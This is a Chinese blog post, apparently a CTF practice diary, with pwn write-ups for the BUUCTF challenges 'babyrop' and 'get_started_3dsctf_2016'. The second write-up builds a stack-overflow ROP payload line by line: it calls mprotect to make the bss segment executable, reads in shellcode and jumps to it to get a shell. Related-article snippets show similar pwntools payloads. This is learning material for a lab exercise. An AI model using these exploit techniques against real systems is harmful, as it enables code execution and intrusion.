buuctf刷题日记

最新推荐文章于 2021-12-10 21:12:15 发布
最新推荐文章于 2021-12-10 21:12:15 发布
阅读量224 收藏
点赞数
分类专栏: 网安实验室
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ching_jen/article/details/108993205
版权

babyrop

ida打开
main函数
在这里插入图片描述sub_804871F():

在这里插入图片描述sub_80487D0():
在这里插入图片描述
可以看到在sub_80487D0()这个函数中,当a1也就是main函数中的参数v2不等于127的时候read函数就可以无限的读入,栈溢出漏洞,所以要改变v2的值。而v2的值是由函数sub_804871F()来赋值,这个函数中可以利用strlen()的特性,它读到’\x00’时就会认为字符长度已读完,还要利用这点来绕过后面的if中条件。参数s的值为0未赋初值。并且这里可以看到v2的地址和buf的地址差0x7,则可以控制v2的值
在这里插入图片描述
exp
在这里插入图片描述

get_started_3dsctf_2016

这里只记录远程的做法
这道题的关键在于mprotect函数(ps:https://blog.csdn.net/roland_sun/article/details/33728955),它的作用总的来说就是可以用来修改一段指定内存区域的保护属性,然后就可以利用这点修改bss段的权限为可读可写可执行就可以帮助拿到shell
分析一下mprotect函数原型

int mprotect(const void *start, size_t len, int prot)
start 内存的起始地址
len 修改内存的长度
prot 内存的权限

所以首先利用栈溢出到mprotect函数的地址准备进行权限修改

payload = 'a'*(0x38) + p32(mprotect_addr)

然后需要设置mprotect的三个参数,本来32位程序是不需要寄存器进行传参的,但是为了后续能够继续控制程序,所以需要ret指令,先查看一下修改内存bss段的地址
在这里插入图片描述这里选择0x80eb000,然后因为mprotect函数有三个参数,所以就找三个的寄存器
在这里插入图片描述这里我选择了0x809e4c5,接着就开始设置mprotect函数的参数,第一个参数设置为刚刚找到的bss段的地址,第二个参数设置为0x1000,第三个参数权限设置为7,然后将函数返回为read地址,继续控制程序读入shellcode,

payload += p32(pop3_ret)
payload += p32(bss_start)
payload += p32(length)
payload += p32(prot)
payload += p32(read_addr)

read函数的函数原型

int read(int fd,char* buf,unsigned count)
fd 设置为0时就可以从输入端读取内容
buf 设置为刚刚修改了权限的bss段地址
count 读入的大小,设置大一些也无所谓方便读入全部的shellcode

可以看到依然是三个参数,所以可以继续利用前面找到的三个寄存器来帮助传参,最后返回到bss的地址执行shellcode

payload += p32(pop3_ret)
payload += p32(0)
payload += p32(bss_start)
payload += p32(0x1000)
payload += p32(bss_start)

接着发送payload然后再传入shellcode,就可以get shell了
exp
在这里插入图片描述

Ching_jen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BUUCTF刷题记录[HFCTF2020]BabyUpload——涉及session反序列化
u013119911的博客
06-30 1558
点开就是源代码,直接进行代码审计
Spring+Quartz实现动态添加定时任务(二)
热门推荐
xlgdst的专栏
02-26 1万+
上一篇介绍了第一部分:定时任务动态配置及持久化本篇介绍第二部分:可视化的管理界面,可以非常清晰的管理自己的所有定时任务先来看一下管理后台对应的界面可以看到在这里我把定时任务的状态分为两大类,任务状态跟业务有关,分为已发布和未发布;计划状态跟定时任务的运行有关,分为None,正常运行,已暂停,任务执行中,线程阻塞,未计划,错误关键代码如下1.计划状态function formatPlan(value...
BUUCTF cmcc_simplerop
qq_51821131的博客
10-05 1872
cmcc_simplerop 由于网络安全课程需要,从本篇开始记录BUU的做题记录及wp 常规操作,拿到文件先检查,保护开得不多 ida查看,存在明显溢出,并且提示要使用ROP 利用pwndbg得到偏移量为0x20 找到了系统调用int 0x80 整理下思路,可以利用mprotect修改bss的权限,并生成shellcode,利用read函数往bss段写入shellcode并且执行,从而拿到shell from pwn import * p=remote('node4.buuoj.cn',29914
BUUCTF get_started_3dsctf_2016(mprotect)
、moddemod
06-10 533
典型的栈溢出 而且还留了后门 在本地可以拿到flag.txt文件,但是远程不行! 栈不可执行 原型: int mprotect(const void *start, size_t len, int prot) start:需改写属性的内存中开始地址 len:需改写属性的内存长度 prot:需要修改为的指定值 功能: mprotect()函数可以用来修改一段指定内存区域的保护属性。 他把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。 prot可以取以下几个值: 1)PRO.
BUUCTF之“jarvisoj_level5”中看如何暗度陈仓实现“mprotect”修改.bss段为可执行
Probeginner的博客
12-10 670
mprotect修改权限实践
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTF部分web题目
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
BUUCTF-PWN刷题日记(一)
weixin_45461609的博客
04-30 1300
BUUCTF-PWN刷题日记rip rip 简单的栈溢出 #coding=utf-8 from pwn import* #r = process('./pwn1') r = remote('node3.buuoj.cn',26123) sys_addr = 0x401186 #address of fun payload = 'a'*(0xf+8) + p64(sys_addr) r.sendli...
BUUCTF pwn wp 6 - 10
fa1c4的blog
05-15 319
jarvisoj_level0 栈溢出, 且到RBP的偏移为0x80, 查找字符串发现有"/bin/sh" 索引到引用的函数, 查看地址是 直接ret2text, 劫持执行流到后门函数即可, 因为是64系统, 所以需要平衡栈, 劫持到后门函数的第二条指令(跳过push RBP), 或者在EBP覆盖retn指令地址, 弹出一个字长内容. from pwn import * URL = "node3.buuoj.cn" PORT = 26152 sel = 1 io = process('./le
VB+ACCESS宾馆客房管理系统(系统+论文+封面).zip
08-16
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
自密实混凝土的研究进展.doc
08-16
自密实混凝土的研究进展.doc
基于Andriod条码识别的商品价格查询软件APP设计与实现.docx
08-16
基于Andriod条码识别的商品价格查询软件APP设计与实现.docx
基于python的人脸控制俄罗斯方块小游戏
08-16
基于python的人脸控制俄罗斯方块小游戏
vb+access高校固定资产管理系统(论文+程序).zip
最新发布
08-16
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
redis,一个使用ANSI C编写的开源、包含多种数据结构、支持网络、基于内存、可选持久性的键值对存储数
08-16
引言 在Web应用发展的初期,那时关系型数据库受到了较为广泛的关注和应用,原因是因为那时候Web站点基本上访问和并发不高、交互也较少。而在后来,随着访问量的提升,使用关系型数据库的Web站点多多少少都开始在性能上出现了一些瓶颈,而瓶颈的源头一般是在磁盘的I/O上。而随着互联网技术的进一步发展,各种类型的应用层出不穷,这导致在当今云计算、大数据盛行的时代,对性能有了更多的需求,主要体现在以下四个方面: 低延迟的读写速度:应用快速地反应能极大地提升用户的满意度 支撑海量的数据和流量:对于搜索这样大型应用而言,需要利用PB级别的数据和能应对百万级的流量 大规模集群的管理:系统管理员希望分布式应用能更简单的部署和管理 庞大运营成本的考量:IT部门希望在硬件成本、软件成本和人力成本能够有大幅度地降低 为了克服这一问题,NoSQL应运而生,它同时具备了高性能、可扩展性强、高可用等优点,受到广泛开发人员和仓库管理人员的青睐。 Redis是什么 Redis是现在最受欢迎的NoSQL数据库之一,Redis是一个使用ANSI C编写的开源、包含多种数据结构、支持网络、基于内存、可选持久性的键值对存储数
51单片机(STC89C2)学习笔记2-4独立按键控制LED移位
08-16
51单片机(STC89C2)学习笔记2-4独立按键控制LED移位C语言代码
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF(Server Side Request Forgery)漏洞,可以通过对内网web应用实施攻击获取webshell。因此,在buuctf web题目中,可能需要掌握SSRF漏洞的利用和对web应用的渲染函数(render函数)进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【CTF】buuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【BUUCTF刷题】Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [BUUCTF的Web真题学习整理(一)](https://blog.csdn.net/qq_41429081/article/details/98042205)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值